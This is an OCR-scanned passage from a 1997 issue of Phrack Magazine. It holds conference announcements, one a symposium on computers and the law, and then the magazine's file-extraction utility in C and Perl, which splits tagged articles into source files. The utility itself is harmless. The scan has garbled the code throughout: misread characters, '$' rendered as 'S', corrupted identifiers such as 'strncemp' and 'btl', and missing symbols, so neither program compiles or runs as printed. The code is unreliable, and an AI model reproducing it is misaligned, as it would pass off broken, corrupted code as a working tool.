International Financial Crimes Studies, College of Law, 
University of Florida, and Kroll Associates, a leading 
investigative firm. For more information call 
800/831-0758 or 

914/693-8100; or e-mail: Oceana@panix.com. 


http://www.oceanalaw.com/seminar/sem_calendar.htm 


Ox2> 


Convention: Computers & The Law IV Symposium 
Date: October 6-9, Boston 


Computers & The Law IV is the only event to bring together corporate 
decision-makers, computer professionals and legal experts to discuss 
Internet 
and Web technology in the eyes of the law. This conference provides 
forum and educational opportunities for all those interested in 
keeping their system investment safe and within the law. 
Topics will include: 
Corporate liablity on the Internet 
Internet risk management in the enterprise 
Hiring a SysAdmin you can trust 
Legal risks of Internet commerce 
Establishing a fair-use policy 
Prosecuting system intruders 
Communicating with your SysAdmin 
Understanding copyright law 
Assessing your exposure to hackers 
Employee privacy vs. owner rights 

and much more! 


+ + + + + F F F F FX 


x 


FOR MORE INFORMATION CONTACT 
The Sun User Group * 14 Harvard Ave, 2nd Floor * Allston, MA 02134 
(617) 787-2301 * conference@sug.org * http://www.sug.org/CL4 
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[ Phrack Magzine Extraction Utility 


SRS SSeS [ Phrack Staff 


This time around, you have the option of using the C version of extract, 
or the PERL version, contributed by Daos. 


8< CUT-HERE >8 

/* extract.c by Phrack Staff and sirsyko 

* 

us (c) Phrack Magazine, 1997 

* 

* Extracts textfiles from a specially tagged flatfile into a hierarchical 
* directory strcuture. Use to extract source code from any of the articles 
* in Phrack Magazine (first appeared in Phrack 50). 

* 

* gcc -o extract extract.c 

* 

* ./extract filename 

ard 


include <stdio.h> 
include <sys/stat.h> 
include <string.h> 


int main(int argc, char **argv) { 


char *s="<++> ",*e="<-->",b[256],*bp; 
FILE *f£,*o = NULL; 
int. dcny L=03 


1 = strilen(s); 
n = strlen(e); 


if(argce<2) { 
printf ("Usage: %s <inputfile>\n",argv[0]); 


exit (1); 

} 

if(! (f=fopen(argv[1], "r"))) { 
printf ("Could not open input file.\n"); 
exit (1); 


} 
while(fgets(b, 256, f)) 


if('strncemp (b, s, 1)) 
b[strlen(b)-1] = ’ 


if ((bp=strchr (b+1+1,'/"'))) 
while (bp) { 
*bp='\0'; 
mkdir (bt+l, 0700); 
ADDS h/ier 
bp=strchr(bpt1,’/'); 


} 
if((o = fopen(btl, "w"))) 
printf("- Extracting %s\n",btl); 
else { 
printf("Could not extract '’%s’\n",btl); 
exit (1); 
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} 
} 
else if(!strncemp (b, e, n)){ 
if(o) fclose(o); 
else { 
printf("Error closing file.\n"); 
exit (1); 


} 
} 
else if(o) { 
fputs(b, 0); 
itt; 
} 
} 
if(!i) printf ("No extraction tags found.\n"); 
return(0); 


8< CUT-HERE >8 


Daos <daos@nym.alias.net> 


<++> extract.pl 
!/bin/sh # —*- perl -* n 
val ’exec perl $0 -S S${1+"S@"}’ if 0; 


Sopening=0; 


if (/*\<\+\+\>/) {Scurfile = substr($_, 5); Sopening=1;}; 
if (/*\<\-\-\>/) {close ct_ex; Sopened=0;}; 
if (Sopening) { 
chop $curfile; 
Ssex_dir= substr( $curfile, 0, ((rindex($curfile,’/’))) ) if (Scurfile =~ m/\//); 
eval {mkdir $sex_dir, "0777"; }; 
open (ct_ex, ">Scurfile"); 
print "Attempting extraction of Scurfile\n"; 
Sopened=1; 


} 
if (Sopened && !Sopening) {print ct_ex S$_}; 
<--> 


----[ EOF 


